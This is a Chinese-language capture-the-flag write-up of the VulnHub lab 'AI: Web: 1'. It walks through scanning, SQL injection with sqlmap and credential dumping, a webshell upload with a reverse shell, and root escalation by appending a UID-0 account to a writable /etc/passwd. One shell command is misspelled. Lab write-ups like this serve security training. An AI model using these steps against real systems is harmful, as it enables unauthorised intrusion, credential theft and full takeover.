Vulnhub-web1.0
前言
继续做vulnhub的题,这次是web1.0。
题目地址:AI: Web: 1 ~ VulnHub
解题过程
kali:192.168.1.110
AI-web:192.168.1.106
探测存活的IP
fping -ag 192.168.1.0/24 > test.txt
打开一康
端口扫描
nmap -sC -sV 192.168.1.106
nmap -p 1-65535 192.168.1.106
发现有个robots.txt,并没有开放ssh
对web进行目录扫描
python3 dirsearch.py -u http://192.168.1.106/ -e path
访问robots.txt
两个路径都是403
robots.txt内容
User-agent: *
Disallow:
Disallow: /m3diNf0/
Disallow: /se3reTdir777/uploads/
对/m3diNf0/进行目录爆破
python3 dirsearch.py -u http://192.168.1.106/m3diNf0/ -e .php
打开看发现是phpinfo
对/se3reTdir777/进行爆破
python3 dirsearch.py -u http://192.168.1.106/se3reTdir777/ -e php
这两个路径一个是名称一个是ID
尝试插入’,发现报错
插入’ #发现返回正常,判断为sql注入
sqlmap跑
数据都跑完之后,得到以下内容
systemuser表里的数据
| 1 | t00r | RmFrZVVzZXJQYXNzdzByZA== FakeUserPassw0rd |
| 2 | aiweb1pwn | TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ== MyEvilPass_f908sdaf9_sadfasf0sa|
| 3 | u3er | TjB0VGhpczBuZUFsczA= N0tThis0neAls0
执行is-dba,发现非root
由于知道物理路径(phpinfo),尝试–os-shell
DOCUMENT_ROOT /home/www/html/web1x443290o2sdf92213
sqlmap给出无写入权限
尝试upload那个路径,getshell成功
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
访问sqlmap的那个可以上传文件的上传webshell
http://192.168.1.106/se3reTdir777/uploads/tmpudktt.php
利用webshell反弹功能,得到一个伪shell
先看了一遍/home目录,发现没啥好用的,然后查了一下/etc/passwd的权限,发现可写
使用perl生成加盐的密码
perl -le 'print crypt("password@123","addedsalt")'
在密码占位符处指定密码,并且UID设置为0,将其添加到 /etc/passwd 文件中
echo "tests:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
由于没看ssh,没法连接上下。而反弹回来的shell不能直接切换用户
python -c "import pty;pty.spawn('/bin/bash')"
export TREM=scrreen
执行上面的命令则可以获得一个”真“shell
得到flag
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。
文章标题:Vulnhub-web1.0
本文作者:九世
发布时间:2019-10-27, 20:09:44
最后更新:2019-10-27, 20:52:48
原始链接:http://jiushill.github.io/posts/1c5edba3.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。